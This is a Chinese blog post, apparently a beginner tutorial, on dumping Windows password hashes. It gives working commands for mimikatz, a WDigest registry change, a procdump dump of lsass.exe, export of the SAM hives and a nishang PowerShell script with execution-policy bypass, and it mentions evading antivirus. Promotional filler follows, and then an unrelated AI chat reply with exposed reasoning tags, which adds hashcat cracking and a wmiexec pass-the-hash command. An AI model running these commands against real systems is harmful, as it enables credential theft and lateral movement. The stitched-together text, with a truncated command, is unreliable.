windows获取hash常见手法

有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!

一 猕猴桃mimikatz

实验环境 win7

适用于Windows 8.1 和 Windows Server 2012 R2 之前

privilege::debug  
  
sekurlsa::logonpasswords

实验环境 win10

Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储

可以读到hash

所有我们要修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

将 UseLogonCredential 设置为 1 然后重启

Shutdown -r -t 0

再用猕猴桃就可以获取到密码了

privilege::debug``   ``sekurlsa::logonpasswords

或者 管理员打开cmd运行procdump导出dmp

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

多说一句,lsass.exe这个Windows系统进程,它负责处理与安全策略和登录身份验证相关的任务,功能有用户登录认证,创建访问令牌。下面这条命令的执行结果是创建一个lsass.exe 进程的完整内存转储文件(12.dmp)。

procdump64.exe -accepteula -ma lsass.exe 12.dmp

然后放到猕猴桃的目录

sekurlsa::minidump 12.dmp  
sekurlsa::logonpasswords full

二 注册表获取sam文件

从注册表导出

reg save hklm\sam e:\sam.hive``reg save hklm\system e:\system.hive

其中hklm 代表 “HKEY_LOCAL_MACHINE”,这是注册表的一个主分支。SAM 是其下的一个子分支,存储了与系统安全账户管理相关的信息,如用户账户和密码哈希。

把这两个hive放到猕猴桃目录

lsadump::sam /sam:sam.hive /system:system.hive

实战中,猕猴桃会被杀或者是不允许上传mimikatz,可以把这两个文件拖到自己的机器上读取,如下图我拖本机的密码到虚拟机里一样可以读取。

希望各位读者看完我们的文章以后自己去实践一下,只有学到脑子里的东西才是自己的,如果遇到困难,可以私信加本人微信,与麋鹿师傅一起探讨,炼心之路,就在脚下,我们一起成长。

三 powershell

用原版肯定被杀,有能力的可以做一下免杀

https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1``powershell -exec bypass "import-module .\Get-PassHashes.ps1;Get-PassHashes"

有师傅说,开赞赏可以增加浏览量,故麋鹿开了该功能,如果您喜欢我们的文章,想让更多的人看到我们的公众号,或者给我们一点小小的鼓励,请您点个赞和再看就行了,如果手头宽裕,打赏一分钱就好啦,谢谢您的喜欢!

`黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

<think>好的,用户现在问的是关于这个NTLM哈希字符串各个字段的意思,也就是“Administrator:500:AAD3B...::”这个结构。我需要先回忆之前的对话历史。之前用户让我介绍NTLM Hash的格式,我详细解释了生成原理、存储位置、对比LM Hash、认证流程等内容,其中还提到了在SAM文件中的存储格式,比如用mimikatz提取时的例子,用户现在的问题就是针对那个例子中的具体字段。 首先,用户可能正在学习Windows认证机制,或者是进行渗透测试、安全分析相关工作。他们可能已经获取到这样的哈希字符串,想要了解每个部分的含义,以便进一步利用或防御。用户可能是安全研究人员、系统管理员,或者学生,需要处理实际的安全事件或学习相关知识点。 接下来,我需要分解这个字符串的每个字段。根据之前的回答,该字符串的结构是:用户名:RID:LM哈希:NTLM哈希:::,后面的三个冒号可能代表其他字段,但通常为空。需要明确每个部分的含义,比如500代表管理员账户的RID,LM哈希部分虽然是AAD3B...,但实际是空值的占位符,因为LM哈希可能被禁用。NTLM哈希部分则是用户密码的MD4哈希值。 另外,用户可能存在的深层需求是理解如何利用这些信息进行攻击或防御。比如,知道RID可以帮助识别高权限账户,而NTLM哈希可用于哈希传递攻击。同时,用户可能需要了解为什么LM哈希部分存在但无效,以及现代系统中如何禁用LM哈希提高安全性。 需要确保解释清晰,每个字段对应什么,以及背后的安全意义。例如,RID为500的是默认管理员账户,而LM哈希的占位符AAD3B...表示系统已禁用LM,使用该占位符代替。同时,强调NTLM哈希的重要性,以及如何防护此类凭据泄露,比如监控lsass进程,启用Credential Guard等。 还需要注意用户可能混淆LM和NTLM哈希,所以需要明确区分两者,指出LM的不安全性及已被淘汰的情况。此外,最后三个冒号可能对应其他字段,如主目录、登录脚本等,但在哈希提取中通常省略,所以可以简要提及。 总结来说,用户需要的是对具体哈希字符串各个字段的详细解释,以及这些信息在实际应用中的意义,可能的安全风险和防护措施。回答时要结构清晰,分点说明,并关联之前的NTLM知识,帮助用户全面理解。</think>你提供的字符串 `Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C:::` 是 Windows 系统中用户凭据的典型格式,常见于通过工具(如 `mimikatz` 或 `secretsdump.py`)提取的哈希值。各字段含义如下: --- ### **1. 字段结构分解** 字符串格式为: `用户名:RID:LM_Hash:NTLM_Hash:::其他字段(通常为空)` #### **具体字段解析:** 1. **`Administrator`** - **含义**:用户名(用户账户名)。 - **说明**:此处是 Windows 默认管理员账户。 2. **`500`** - **含义**:**RID(Relative Identifier,相对标识符)**,唯一标识用户的数字。 - **说明**: - `500` 是 Windows 默认管理员账户的固定 RID。 - 普通用户 RID 通常从 `1000` 开始递增(如 `1001`, `1002` 等)。 3. **`AAD3B435B51404EEAAD3B435B51404EE`** - **含义**:**LM Hash(已弃用)**,早期用于兼容旧系统的哈希值。 - **说明**: - 若系统禁用 LM Hash(默认现代系统禁用),该字段会被固定填充值 `AAD3B435B51404EEAAD3B435B51404EE`。 - 实际密码的 LM Hash 可能为空,但格式仍保留占位符。 4. **`8846F7EAEE8FB117AD06BDD830B7586C`** - **含义**:**NTLM Hash**,用户密码的 MD4 哈希值。 - **说明**: - 核心认证凭据,用于生成 NTLM 协议中的挑战-响应(Challenge-Response)。 - 示例中的哈希对应密码 `Password123`。 5. **末尾的 `:::`** - **含义**:其他字段(通常为空),可能包含: - 用户主目录路径 - 登录脚本路径 - 密码过期时间等 - **说明**:在哈希提取场景中,这些字段一般无实际值。 --- ### **2. 关键字段的安全意义** #### **(1) RID 500 的特殊性** - **管理员权限**:RID 500 用户默认拥有系统最高权限,是攻击者重点目标。 - **重命名防御**:建议重命名 `Administrator` 账户并禁用 RID 500,以增加攻击难度。 #### **(2) LM Hash 占位符** - **禁用 LM Hash**:现代系统默认禁用 LM Hash(通过组策略 `Network Security: Do not store LAN Manager hash value`),占位符无实际密码信息。 - **历史漏洞**:若真实 LM Hash 存在(如旧系统),可能被快速破解(如彩虹表攻击)。 #### **(3) NTLM Hash 的威胁** - **哈希传递攻击(Pass-the-Hash)**:攻击者可直接使用 NTLM Hash 冒充用户身份,无需破解明文密码。 - **防护措施**: - 启用 Credential Guard(虚拟化安全隔离)。 - 监控 `lsass.exe` 进程内存访问(防止哈希提取)。 --- ### **3. 实际应用场景** #### **(1) 密码破解** -m 1000 8846F7EAEE8FB117AD06BDD830B7586C rockyou.txt ``` - `-m 1000` 表示 NTLM Hash 模式。 #### **(2) 横向移动** - **哈希传递(PTH)**: 攻击者可通过工具(如 `psexec` 或 `wmiexec.py`)直接使用哈希访问其他系统: ```bash wmiexec.py -hashes :8846F7EAEE8FB117AD06BDD830B7586C Administrator@192.168.1.10 ``` --- ### **4. 安全建议** 1. **禁用 LM Hash**:通过组策略强制禁用 LM Hash。 2. **监控特权账户**:重点关注 RID 500 账户的异常登录行为。 3. **升级认证协议**:优先使用 Kerberos 代替 NTLM。 4. **最小权限原则**:限制管理员账户的远程登录权限。 --- ### **总结** 该字符串完整展示了 Windows 用户凭据的核心字段:用户名、RID、LM Hash(占位符)和 NTLM Hash。理解其结构对渗透测试(如哈希破解)和防御(如监控哈希泄露)均至关重要。若需进一步探讨具体攻击手法或防御策略,可继续交流!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值